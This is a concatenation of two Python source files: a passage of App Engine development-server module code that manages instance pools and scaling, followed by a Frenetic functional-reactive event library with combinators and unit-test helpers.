"""Creates and adds a new instance.Instance to the Module.
This must be called with _instances_change_lock held.
"""
instance_id = self.get_num_instances()
assert self._max_instances is None or instance_id < self._max_instances
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr = wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst))
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._wsgi_servers.append(wsgi_servr)
self._instances.append(inst)
suspended = self._suspended
if not suspended:
self._async_start_instance(wsgi_servr, inst)
def _async_start_instance(self, wsgi_servr, inst):
_THREAD_POOL.submit(self._start_instance, wsgi_servr, inst)
def _start_instance(self, wsgi_servr, inst):
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time:
for inst in self._instances:
if inst.can_accept_requests:
return inst
self._condition.wait(timeout_time - time.time())
return None
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
with self._instances_change_lock:
if not self._suspended:
self.restart()
def _loop_watching_for_changes(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def get_num_instances(self):
with self._instances_change_lock:
with self._condition:
return len(self._instances)
def set_num_instances(self, instances):
if self._max_instances is not None:
instances = min(instances, self._max_instances)
with self._instances_change_lock:
with self._condition:
running_instances = self.get_num_instances()
if running_instances > instances:
wsgi_servers_to_quit = self._wsgi_servers[instances:]
del self._wsgi_servers[instances:]
instances_to_quit = self._instances[instances:]
del self._instances[instances:]
if running_instances < instances:
for _ in xrange(instances - running_instances):
self._add_instance()
if running_instances > instances:
for inst, wsgi_servr in zip(instances_to_quit, wsgi_servers_to_quit):
self._async_quit_instance(inst, wsgi_servr)
def _async_quit_instance(self, inst, wsgi_servr):
_THREAD_POOL.submit(self._quit_instance, inst, wsgi_servr)
def _quit_instance(self, inst, wsgi_servr):
port = wsgi_servr.port
wsgi_servr.quit()
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def suspend(self):
"""Suspends serving for this module, quitting all running instances."""
with self._instances_change_lock:
if self._suspended:
raise request_info.ModuleAlreadyStoppedError()
self._suspended = True
with self._condition:
instances_to_stop = zip(self._instances, self._wsgi_servers)
for wsgi_servr in self._wsgi_servers:
wsgi_servr.set_error(404)
for inst, wsgi_servr in instances_to_stop:
self._async_suspend_instance(inst, wsgi_servr.port)
def _async_suspend_instance(self, inst, port):
_THREAD_POOL.submit(self._suspend_instance, inst, port)
def _suspend_instance(self, inst, port):
inst.quit(expect_shutdown=True)
self._shutdown_instance(inst, port)
def resume(self):
"""Resumes serving for this module."""
with self._instances_change_lock:
if not self._suspended:
raise request_info.ModuleAlreadyStartedError()
self._suspended = False
with self._condition:
if self._quit_event.is_set():
return
wsgi_servers = self._wsgi_servers
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[instance_id] = inst
instances_to_start.append((wsgi_servr, inst))
for wsgi_servr, inst in instances_to_start:
self._async_start_instance(wsgi_servr, inst)
def restart(self):
"""Restarts the the module, replacing all running instances."""
with self._instances_change_lock:
with self._condition:
if self._quit_event.is_set():
return
instances_to_stop = self._instances[:]
wsgi_servers = self._wsgi_servers[:]
instances_to_start = []
for instance_id, wsgi_servr in enumerate(wsgi_servers):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
wsgi_servr.set_app(functools.partial(self._handle_request, inst=inst))
self._port_registry.add(wsgi_servr.port, self, inst)
instances_to_start.append(inst)
with self._condition:
if self._quit_event.is_set():
return
self._instances[:] = instances_to_start
for inst, wsgi_servr in zip(instances_to_stop, wsgi_servers):
self._async_suspend_instance(inst, wsgi_servr.port)
for wsgi_servr, inst in zip(wsgi_servers, instances_to_start):
self._async_start_instance(wsgi_servr, inst)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class BasicScalingModule(Module):
"""A pool of instances that is basic-scaled."""
_DEFAULT_BASIC_SCALING = appinfo.BasicScaling(max_instances='1',
idle_timeout='15m')
_MAX_REQUEST_WAIT_TIME = 10
@staticmethod
def _parse_idle_timeout(timing):
"""Parse a idle timeout string into an int of the value in seconds.
Args:
timing: A str of the form 1m or 10s.
Returns:
An int representation of the value in seconds.
"""
if timing.endswith('m'):
return int(timing[:-1]) * 60
else:
return int(timing[:-1])
@classmethod
def _populate_default_basic_scaling(cls, basic_scaling):
for attribute in basic_scaling.ATTRIBUTES:
if getattr(basic_scaling, attribute) in ('basic', None):
setattr(basic_scaling, attribute,
getattr(cls._DEFAULT_BASIC_SCALING, attribute))
def _process_basic_scaling(self, basic_scaling):
if basic_scaling:
self._populate_default_basic_scaling(basic_scaling)
else:
basic_scaling = self._DEFAULT_BASIC_SCALING
if self._max_instances is not None:
self._max_instances = min(self._max_instances,
int(basic_scaling.max_instances))
else:
self._max_instances = int(basic_scaling.max_instances)
self._instance_idle_timeout = self._parse_idle_timeout(
basic_scaling.idle_timeout)
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
external_api_port=None):
"""Initializer for BasicScalingModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for a module.
host: A string containing the host that any HTTP servers should bind to
e.g. "localhost".
balanced_port: An int specifying the port where the balanced module for
the pool should listen.
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
max_instances: The maximum number of instances to create for this module.
If None then there is no limit on the number of created instances.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
automatic_restarts: If True then instances will be restarted when a
file or configuration change that effects them is detected.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
external_api_port: An integer specifying the location of an external API
server.
"""
super(BasicScalingModule, self).__init__(module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances,
use_mtime_file_watcher,
automatic_restarts,
allow_skipped_files,
external_api_port)
self._process_basic_scaling(module_configuration.basic_scaling)
self._instances = [] # Protected by self._condition.
self._wsgi_servers = [] # Protected by self._condition.
# A list of booleans signifying whether the corresponding instance in
# self._instances has been or is being started.
self._instance_running = [] # Protected by self._condition.
for instance_id in xrange(self._max_instances):
inst = self._instance_factory.new_instance(instance_id,
expect_ready_request=True)
self._instances.append(inst)
self._wsgi_servers.append(wsgi_server.WsgiServer(
(self._host, 0), functools.partial(self._handle_request, inst=inst)))
self._instance_running.append(False)
self._condition = threading.Condition() # Protects instance state.
self._change_watcher_thread = threading.Thread(
target=self._loop_watching_for_changes_and_idle_instances)
def start(self):
"""Start background management of the Module."""
self._balanced_module.start()
self._port_registry.add(self.balanced_port, self, None)
if self._watcher:
self._watcher.start()
self._change_watcher_thread.start()
for wsgi_servr, inst in zip(self._wsgi_servers, self._instances):
wsgi_servr.start()
self._port_registry.add(wsgi_servr.port, self, inst)
def quit(self):
"""Stops the Module."""
self._quit_event.set()
self._change_watcher_thread.join()
# The instance adjustment thread depends on the balanced module and the
# watcher so wait for it exit before quitting them.
if self._watcher:
self._watcher.quit()
self._balanced_module.quit()
for wsgi_servr in self._wsgi_servers:
wsgi_servr.quit()
with self._condition:
instances = self._instances
self._instances = []
self._condition.notify_all()
for inst in instances:
inst.quit(force=True)
def get_instance_port(self, instance_id):
"""Returns the port of the HTTP server for an instance."""
try:
instance_id = int(instance_id)
except ValueError:
raise request_info.InvalidInstanceIdError()
with self._condition:
if 0 <= instance_id < len(self._instances):
wsgi_servr = self._wsgi_servers[instance_id]
else:
raise request_info.InvalidInstanceIdError()
return wsgi_servr.port
@property
def instances(self):
"""A set of all the instances currently in the Module."""
with self._condition:
return set(self._instances)
def _handle_instance_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst,
request_type):
"""Handles a request routed a particular Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
instance_id = inst.instance_id
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
try:
while time.time() < timeout_time:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
pass
if inst.has_quit:
return self._error_response(environ, start_response, 503)
with self._condition:
if self._instance_running[instance_id]:
should_start = False
else:
self._instance_running[instance_id] = True
should_start = True
if should_start:
self._start_instance(instance_id)
else:
inst.wait(timeout_time)
else:
return self._error_response(environ, start_response, 503)
finally:
with self._condition:
self._condition.notify()
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.NORMAL_REQUEST):
"""Handles a HTTP request that has matched a script handler.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to. If None then an
appropriate instance.Instance will be chosen.
request_type: The type of the request. See instance.*_REQUEST module
constants.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
if self._module_configuration.is_backend:
environ['BACKEND_ID'] = self._module_configuration.module_name
else:
environ['BACKEND_ID'] = (
self._module_configuration.version_id.split('.', 1)[0])
if inst is not None:
return self._handle_instance_request(
environ, start_response, url_map, match, request_id, inst,
request_type)
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
if self._quit_event.is_set():
return self._error_response(environ, start_response, 404)
inst = self._choose_instance(timeout_time)
if inst:
try:
logging.debug('Dispatching request to %s after %0.4fs pending',
inst, time.time() - start_time)
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
continue
finally:
with self._condition:
self._condition.notify()
else:
return self._error_response(environ, start_response, 503)
def _start_any_instance(self):
"""Choose an inactive instance and start it asynchronously.
Returns:
An instance.Instance that will be started asynchronously or None if all
instances are already running.
"""
with self._condition:
for instance_id, running in enumerate(self._instance_running):
if not running:
self._instance_running[instance_id] = True
inst = self._instances[instance_id]
break
else:
return None
self._async_start_instance(instance_id)
return inst
def _async_start_instance(self, instance_id):
_THREAD_POOL.submit(self._start_instance, instance_id)
def _start_instance(self, instance_id):
with self._condition:
if self._quit_event.is_set():
return
wsgi_servr = self._wsgi_servers[instance_id]
inst = self._instances[instance_id]
if inst.start():
logging.debug('Started instance: %s at http://%s:%s', inst, self.host,
wsgi_servr.port)
try:
environ = self.build_request_environ(
'GET', '/_ah/start', [], '', '0.1.0.3', wsgi_servr.port,
fake_login=True)
self._handle_request(environ,
start_response_utils.null_start_response,
inst=inst,
request_type=instance.READY_REQUEST)
logging.debug('Sent start request: %s', inst)
with self._condition:
self._condition.notify(self.max_instance_concurrent_requests)
except:
logging.exception('Internal error while handling start request.')
def _choose_instance(self, timeout_time):
"""Returns an Instance to handle a request or None if all are busy."""
with self._condition:
while time.time() < timeout_time and not self._quit_event.is_set():
for inst in self._instances:
if inst.can_accept_requests:
return inst
else:
inst = self._start_any_instance()
if inst:
break
self._condition.wait(timeout_time - time.time())
else:
return None
if inst:
inst.wait(timeout_time)
return inst
def _handle_changes(self):
"""Handle file or configuration changes."""
# Always check for config and file changes because checking also clears
# pending changes.
config_changes = self._module_configuration.check_for_updates()
has_file_changes = self._watcher.has_changes()
if application_configuration.HANDLERS_CHANGED in config_changes:
handlers = self._create_url_handlers()
with self._handler_lock:
self._handlers = handlers
if has_file_changes:
self._instance_factory.files_changed()
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES:
self._instance_factory.configuration_changed(config_changes)
if config_changes & _RESTART_INSTANCES_CONFIG_CHANGES or has_file_changes:
self.restart()
def _loop_watching_for_changes_and_idle_instances(self):
"""Loops until the InstancePool is done watching for file changes."""
while not self._quit_event.is_set():
if self.ready:
self._shutdown_idle_instances()
if self._automatic_restarts:
self._handle_changes()
self._quit_event.wait(timeout=1)
def _shutdown_idle_instances(self):
instances_to_stop = []
with self._condition:
for instance_id, inst in enumerate(self._instances):
if (self._instance_running[instance_id] and
inst.idle_seconds > self._instance_idle_timeout):
instances_to_stop.append((self._instances[instance_id],
self._wsgi_servers[instance_id]))
self._instance_running[instance_id] = False
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for inst, wsgi_servr in instances_to_stop:
logging.debug('Shutting down %r', inst)
self._stop_instance(inst, wsgi_servr)
def _stop_instance(self, inst, wsgi_servr):
inst.quit(expect_shutdown=True)
self._async_shutdown_instance(inst, wsgi_servr.port)
def restart(self):
"""Restarts the the module, replacing all running instances."""
instances_to_stop = []
instances_to_start = []
with self._condition:
if self._quit_event.is_set():
return
for instance_id, inst in enumerate(self._instances):
if self._instance_running[instance_id]:
instances_to_stop.append((inst, self._wsgi_servers[instance_id]))
new_instance = self._instance_factory.new_instance(
instance_id, expect_ready_request=True)
self._instances[instance_id] = new_instance
instances_to_start.append(instance_id)
wsgi_servr = self._wsgi_servers[instance_id]
wsgi_servr.set_app(
functools.partial(self._handle_request, inst=new_instance))
self._port_registry.add(wsgi_servr.port, self, new_instance)
for instance_id in instances_to_start:
self._async_start_instance(instance_id)
for inst, wsgi_servr in instances_to_stop:
self._stop_instance(inst, wsgi_servr)
def get_instance(self, instance_id):
"""Returns the instance with the provided instance ID."""
try:
with self._condition:
return self._instances[int(instance_id)]
except (ValueError, IndexError):
raise request_info.InvalidInstanceIdError()
def __call__(self, environ, start_response, inst=None):
return self._handle_request(environ, start_response, inst)
@property
def supports_individually_addressable_instances(self):
return True
class InteractiveCommandModule(Module):
"""A Module that can evaluate user commands.
This module manages a single Instance which is started lazily.
"""
_MAX_REQUEST_WAIT_TIME = 15
def __init__(self,
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
use_mtime_file_watcher,
allow_skipped_files):
"""Initializer for InteractiveCommandModule.
Args:
module_configuration: An application_configuration.ModuleConfiguration
instance storing the configuration data for this module.
host: A string containing the host that will be used when constructing
HTTP headers sent to the Instance executing the interactive command
e.g. "localhost".
balanced_port: An int specifying the port that will be used when
constructing HTTP headers sent to the Instance executing the
interactive command e.g. "localhost".
api_port: The port that APIServer listens for RPC requests on.
auth_domain: A string containing the auth domain to set in the environment
variables.
runtime_stderr_loglevel: An int reprenting the minimum logging level at
which runtime log messages should be written to stderr. See
devappserver2.py for possible values.
php_executable_path: A string containing the path to PHP execution e.g.
"/usr/bin/php-cgi".
enable_php_remote_debugging: A boolean indicating whether the PHP
interpreter should be started with XDebug remote debugging enabled.
python_config: A runtime_config_pb2.PythonConfig instance containing
Python runtime-specific configuration. If None then defaults are
used.
cloud_sql_config: A runtime_config_pb2.CloudSQL instance containing the
required configuration for local Google Cloud SQL development. If None
then Cloud SQL will not be available.
default_version_port: An int containing the port of the default version.
port_registry: A dispatcher.PortRegistry used to provide the Dispatcher
with a mapping of port to Module and Instance.
request_data: A wsgi_request_info.WSGIRequestInfo that will be provided
with request information for use by API stubs.
dispatcher: A Dispatcher instance that can be used to make HTTP requests.
use_mtime_file_watcher: A bool containing whether to use mtime polling to
monitor file changes even if other options are available on the
current platform.
allow_skipped_files: If True then all files in the application's directory
are readable, even if they appear in a static handler or "skip_files"
directive.
"""
super(InteractiveCommandModule, self).__init__(
module_configuration,
host,
balanced_port,
api_port,
auth_domain,
runtime_stderr_loglevel,
php_executable_path,
enable_php_remote_debugging,
python_config,
cloud_sql_config,
default_version_port,
port_registry,
request_data,
dispatcher,
max_instances=1,
use_mtime_file_watcher=use_mtime_file_watcher,
automatic_restarts=True,
allow_skipped_files=allow_skipped_files)
# Use a single instance so that state is consistent across requests.
self._inst_lock = threading.Lock()
self._inst = None
@property
def balanced_port(self):
"""The port that the balanced HTTP server for the Module is listening on.
The InteractiveCommandModule does not actually listen on this port but it is
used when constructing the "SERVER_PORT" in the WSGI-environment.
"""
return self._balanced_port
def quit(self):
"""Stops the InteractiveCommandModule."""
if self._inst:
self._inst.quit(force=True)
self._inst = None
def _handle_script_request(self,
environ,
start_response,
url_map,
match,
request_id,
inst=None,
request_type=instance.INTERACTIVE_REQUEST):
"""Handles a interactive request by forwarding it to the managed Instance.
Args:
environ: An environ dict for the request as defined in PEP-333.
start_response: A function with semantics defined in PEP-333.
url_map: An appinfo.URLMap instance containing the configuration for the
handler that matched.
match: A re.MatchObject containing the result of the matched URL pattern.
request_id: A unique string id associated with the request.
inst: The instance.Instance to send the request to.
request_type: The type of the request. See instance.*_REQUEST module
constants. This must be instance.INTERACTIVE_REQUEST.
Returns:
An iterable over strings containing the body of the HTTP response.
"""
assert inst is None
assert request_type == instance.INTERACTIVE_REQUEST
start_time = time.time()
timeout_time = start_time + self._MAX_REQUEST_WAIT_TIME
while time.time() < timeout_time:
new_instance = False
with self._inst_lock:
if not self._inst:
self._inst = self._instance_factory.new_instance(
AutoScalingModule.generate_instance_id(),
expect_ready_request=False)
new_instance = True
inst = self._inst
if new_instance:
self._inst.start()
try:
return inst.handle(environ, start_response, url_map, match,
request_id, request_type)
except instance.CannotAcceptRequests:
inst.wait(timeout_time)
except Exception:
# If the instance is restarted while handling a request then the
# exception raises is unpredictable.
if inst != self._inst:
start_response('503 Service Unavailable', [])
return ['Instance was restarted while executing command']
logging.exception('Unexpected exception handling command: %r', environ)
raise
else:
start_response('503 Service Unavailable', [])
return ['The command timed-out while waiting for another one to complete']
def restart(self):
"""Restarts the the module."""
with self._inst_lock:
if self._inst:
self._inst.quit(force=True)
self._inst = None
def send_interactive_command(self, command):
"""Sends an interactive command to the module.
Args:
command: The command to send e.g. "print 5+5".
Returns:
A string representing the result of the command e.g. "10\n".
Raises:
InteractiveCommandError: if the command failed for any reason.
"""
start_response = start_response_utils.CapturingStartResponse()
# 192.0.2.0 is an example address defined in RFC 5737.
environ = self.build_request_environ(
'POST', '/', [], command, '192.0.2.0', self.balanced_port)
try:
response = self._handle_request(
environ,
start_response,
request_type=instance.INTERACTIVE_REQUEST)
except Exception as e:
raise InteractiveCommandError('Unexpected command failure: ', str(e))
if start_response.status != '200 OK':
raise InteractiveCommandError(start_response.merged_response(response))
return start_response.merged_response(response)
|
agentFreLib.py
|
################################################################################
# The Frenetic Project #
# frenetic@frenetic-lang.org #
################################################################################
# Licensed to the Frenetic Project by one or more contributors. See the #
# NOTICE file distributed with this work for additional information #
# regarding copyright and ownership. The Frenetic Project licenses this #
# file to you under the following license. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided the following conditions are met: #
# - Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# - Redistributions in binary form must reproduce the above copyright #
# notice, this list of conditions and the following disclaimer in #
# the documentation or other materials provided with the distribution. #
# - The names of the copyright holds and contributors may not be used to #
# endorse or promote products derived from this work without specific #
# prior written permission. #
# #
# Unless required by applicable law or agreed to in writing, software #
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT #
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the #
# LICENSE file distributed with this work for specific language governing #
# permissions and limitations under the License. #
################################################################################
# /src/frenetic_lib.py #
# Frenetic standard library #
# $Id$ #
################################################################################
import inspect
import sys
import threading
import agentFreUtil as util
import agentFreTypes as types
from agentFreFrp import FEvent, FEventFun, FListener, FBehavior, RawEvent
# JNF: these flags should really be set from the command line
# turning them on for now
RUN_TESTS = False
DEBUG = True
##########
# EVENTS #
##########
# switchJoin : E switch
(switchJoin_E,switchJoin_go) = RawEvent()
def SwitchJoin():
return switchJoin_E
# switchLeave : E switch
(switchLeave_E,switchLeave_go) = RawEvent()
def SwitchLeave():
return switchLeave_E
# seconds : E int
#(seconds_E,seconds_go) = RawEvent()
#seconds_going = False
#def seconds_callback():
# seconds_go(util.current_time())
# net.inst.post_callback(1, seconds_callback)
# return True
#def Seconds():
# global seconds_going
# if not seconds_going:
# seconds_going = True
# seconds_callback()
# return seconds_E
# PortEvents() : E (PortEvent)
#(portEvent_E, portEvent_go) = RawEvent()
#def PortEvents():
# return portEvent_E
# Input : string -> E string
def Input(prompt):
(e,go) = RawEvent()
def run():
try:
while True:
x = raw_input(prompt)
go(x)
except EOFError:
for l in e.listeners.itervalues():
l.terminate()
exit(0)
t = threading.Thread(target=run)
t.start()
return e
# Merge : E a * E b -> E (a option * b option)
def Merge(e1,e2):
e = None
def prepare():
e.fresh = False
for l in e.listeners.itervalues():
l.prepare()
def push1(x1):
if e2.fresh or e2.cell.get() != None:
x2 = e2.cell.get()
for l in e.listeners.itervalues():
l.push((x1,x2))
e2.cell.set(None)
else:
e1.cell.set(x1)
def push2(x2):
if e1.fresh or e1.cell.get() != None:
x1 = e1.cell.get()
for l in e.listeners.itervalues():
l.push((x1,x2))
e1.cell.set(None)
else:
e2.cell.set(x2)
def finish():
x1 = e1.cell.get()
x2 = e2.cell.get()
e1.cell.set(None)
e2.cell.set(None)
if x2 != None:
for l in e.listeners.itervalues():
l.push((None,x2))
if x1 != None:
for l in e.listeners.itervalues():
l.push((x1,None))
for l in e.listeners.itervalues():
l.finish()
e.fresh = True
def terminate1():
e.term1 = True
if e.term2:
for l in e.listeners.itervalues():
l.terminate()
def terminate2():
e.term2 = True
if e.term1:
for l in e.listeners.itervalues():
l.terminate()
e1.add_listener(FListener(prepare,push1,finish,terminate1))
e2.add_listener(FListener(prepare,push2,finish,terminate2))
if e1.type is None or e2.type is None:
out_type = None
else:
# TODO(astory): option
out_type = types.FType((e1.type.type, e2.type.type))
e = FEvent(type=out_type)
e.term1 = False
e.term2 = False
e1.cell = util.FRef()
e2.cell = util.FRef()
return e
# Split E (a * b) -> E a * E b
def Split(e):
e1 = None
e2 = None
def prepare():
e1.fresh = False
e2.fresh = False
for l in e1.listeners.itervalues():
l.prepare()
for l in e2.listeners.itervalues():
l.prepare()
def push((x1,x2)):
for l in e1.listeners.itervalues():
l.push(x1)
for l in e2.listeners.itervalues():
l.push(x2)
def finish():
for l in e1.listeners.itervalues():
l.finish()
for l in e2.listeners.itervalues():
l.finish()
e1.fresh = True
e2.fresh = True
def terminate():
for l in e1.listeners.itervalues():
l.terminate()
for l in e2.listeners.itervalues():
l.terminate()
t1 = t2 = None
if e.type is not None:
try:
(r1, r2) = e.type.type
(t1, t2) = (types.FType(r1), types.FType(r2))
except (TypeError, ValueError):
raise types.FTypeException("%s not of type %s" % (e.type, "a * b"))
e1 = FEvent(type=t1)
e2 = FEvent(type=t2)
e.add_listener(FListener(prepare,push,finish,terminate))
return (e1,e2)
# Apply : E a * EF a b -> E b
def Apply(e1,ef2):
e = None
def prepare():
e.fresh = False
ef2.prepare()
def push(x):
ef2.push(x)
def finish():
ef2.finish()
e.fresh = True
e1.add_listener(FListener(prepare,push,finish,ef2.terminate))
t = None
if ef2.type_fun is not None:
t = ef2.type_fun(e1.type)
e = FEvent(ef2.add_listener, type=t)
return e
############################
# UNIT TESTS AND DEBUGGING #
############################
def unit_test(i, ef, o):
if RUN_TESTS:
def location():
(filename,lineno) = inspect.stack()[2][1:3]
return "File \"" + filename + "\", line " + str(lineno)
(ei,go) = RawEvent()
e = Apply(ei,ef)
def f(x):
y = o.pop(0)
if x != y:
print "%s: Unit test error\nexpected %s\nbut found %s" % (location(),str(y),str(x))
e.add_listener(FListener(push=f))
for x in i:
go(x)
for l in ei.listeners.itervalues():
l.terminate()
if len(o) != 0:
print "%s: Unit test error\nextra outputs %s" % (location(),str(o))
return
def unit_test_merge(i,ef,o):
if RUN_TESTS:
def location():
(filename,lineno) = inspect.stack()[2][1:3]
return "File \"" + filename + "\", line " + str(lineno)
(eia,goa) = RawEvent()
(eib,gob) = RawEvent()
e = ef(eia,eib)
def f((p,q)):
(x,y) = (None,None)
if len(o) > 0:
(x,y) = o.pop(0)
if (x,y) != (p,q):
print sys.stderr, "%s: Unit test error\nexpected %s\nbut found %s" % (location(),str((x,y)), str((p,q)))
e.add_listener(FListener(push=f))
for (a,b) in i:
if not(a is None) and not(b is None):
# This isn't truly a parallel call
(goa(a),gob(b))
elif not(a is None):
goa(a)
elif not(b is None):
gob(b)
for l in eia.listeners.itervalues():
l.terminate()
for l in eib.listeners.itervalues():
l.terminate()
if len(o) != 0:
print sys.stderr, "%s: Unit test error\nextra outputs %s" % (location(),str(o))
return
def debug_test(i,ef):
if DEBUG:
def location():
(filename,lineno) = inspect.stack()[2][1:3]
return "File \"" + filename + "\", line " + str(lineno)
(ei,go) = RawEvent()
e = Apply(ei,ef)
o = []
def f(x):
o.append(x)
e.add_listener(FListener(push=f))
for x in i:
go(x)
ei.terminate()
print "%s: Test result:\n%s" % (location(),str(o))
return
###################
# EVENT FUNCTIONS #
###################
# Lift: (a -> b) -> EF a b
def Lift(g, in_type=None, out_type=None, type_fun=None):
"""Lift function g into an EF. Optional type annotations {in,out}_type, or
you can give a type conversion function, which overrides static types.
Note that in_type and out_type MUST be wrapped in types.FType,or something
with its interface, and type_fun should expect its input and output wrapped
in the same class.
A None type object acts as a signal to ignore type checking this
type. It should not throw type exceptions."""
ef = None
def push(x):
y = g(x)
for l in ef.listeners.itervalues():
l.push(y)
if type_fun is None:
def type_fun(test_in_type):
if in_type is None or types.is_of_type(test_in_type, in_type):
return out_type
else:
raise types.FTypeException(
"%s not of type %s" % (test_in_type, in_type))
ef = FEventFun(push=push, type_fun=type_fun)
return ef
# Compose: EF a b * EF b c -> EF a c
def Compose(ef1,ef2):
ef1.add_listener(ef2)
def type_fun(t):
if t is None:
return None
out1 = ef1.type_fun(t)
if out1 is None:
return None
out2 = ef2.type_fun(out1)
return out2
ef = FEventFun(
ef2.add_listener,
ef1.prepare,
ef1.push,
ef1.finish,
ef1.terminate,
type_fun)
return ef
# First : EF a b -> EF (a * c) (b * c)
def First(ef1):
ef = None
def prepare():
ef1.prepare()
for l in ef.listeners.itervalues():
l.prepare()
def push((x1,x2)):
ef.cell.set(x2)
ef1.push(x1)
def push2(y1):
y2 = ef.cell.get()
for l in ef.listeners.itervalues():
l.push((y1,y2))
def finish():
ef1.finish()
for l in ef.listeners.itervalues():
l.finish()
def terminate():
ef1.terminate()
for l in ef.listeners.itervalues():
l.terminate()
def type_fun(in_type):
if in_type is None:
return None
try:
(a, c) = in_type.type
except ValueError:
raise types.FTypeException("%s not of type (a * c)" % in_type)
return types.FType((ef1.type_fun(types.FType(a)).type, c))
ef = FEventFun(
prepare=prepare,
push=push,
finish=finish,
terminate=terminate,
type_fun=type_fun)
ef.cell = util.FRef()
ef1.add_listener(FListener(push=push2))
return ef
